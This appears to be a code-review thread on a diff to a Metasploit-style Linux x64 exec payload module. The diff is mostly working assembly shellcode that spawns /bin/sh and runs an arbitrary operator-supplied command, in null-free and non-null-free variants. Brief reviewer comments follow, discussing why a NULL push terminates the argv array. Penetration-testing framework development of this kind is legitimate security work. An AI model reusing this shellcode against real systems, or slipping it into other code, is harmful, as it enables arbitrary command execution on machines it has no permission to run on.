modules/payloads/singles/linux/x64/exec.rb

```diff
@@ -5,45 +5,170 @@
+
+            syscall                 ; execve("//bin/sh", NULL, NULL)
+        EOS
+
+      else
+        # 21 bytes (not null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f
+            cdq                     ; edx = NULL
+
+            push rax
+            push rsp
+            pop rdi                 ; "/bin/sh"
+
+            push rdx
+            pop rsi                 ; NULL
+
+            push 0x3b
+            pop rax
+
+            syscall                 ; execve("/bin/sh", NULL, NULL)
+        EOS
+      end
+    else
+      #
+      # Dynamically builds the exec payload based on the user's options.
+      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
+      #
+      pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)
+
+      if nullfreeversion
+        if cmd.length > 0xffff
+          raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()
+        end
+        if cmd.length <= 0xff # 255
+          breg = "bl"
+        else
+          breg = "bx"
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += " "
+          end
+        end
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+
+        # 48 bytes without cmd (null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f2f
+            cdq                     ; edx = NULL
+
+            jmp tocall              ; jmp/call/pop cmd address
+          afterjmp:
+            pop rbp                 ; *CMD*
+
+            push rdx
+            pop rbx
+            #{mov_cmd_len_to_breg}  ; mov (byte/word) (bl/bx), cmd.length
+            mov [rbp + rbx], dl     ; NUL '\0' terminate cmd
+
+            push rdx
+            #{pushw_c_opt}
+            push rsp
+            pop rsi                 ; "-c"
+
+            push rdx
+            push rax
+            push rsp
+            pop rdi                 ; "//bin/sh"
+
+            push rdx                ; NULL
+            push rbp                ; *CMD*
+            push rsi                ; "-c"
+            push rdi                ; "//bin/sh"
+            push rsp
+            pop rsi                 ; ["//bin/sh", "-c", "*CMD*"]
+
+            push 0x3b
+            pop rax
+
+            syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
+          tocall:
+            call afterjmp
+            db "#{cmd}"             ; arbitrary command
+        EOS
+      else
+        # 37 bytes without cmd (not null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f
+            cdq                     ; edx = NULL
+
+            push rax
+            push rsp
+            pop rdi                 ; "/bin/sh"
+
+            push rdx
+            #{pushw_c_opt}
+            push rsp
+            pop rsi                 ; "-c"
+
+            push rdx                ; NULL
+            call continue
+            db "#{cmd}", 0x00       ; arbitrary command
```

Comment:
Question but is this `push rdx` to terminate the command to be executed? Cause with the `db` command you are already NULL terminating the command, so we could potentially save some space.

Reply:
Same here in line 156. The `push rdx` (zero) is terminating the array of pointers `argv`. There's no guarantee of the injected shellcode address and rsp to be near or adjacent.

Reply:
Thanks, wasn't aware of the NULL terminator being required to terminate the array of pointers. This makes sense so I'll mark this as resolved.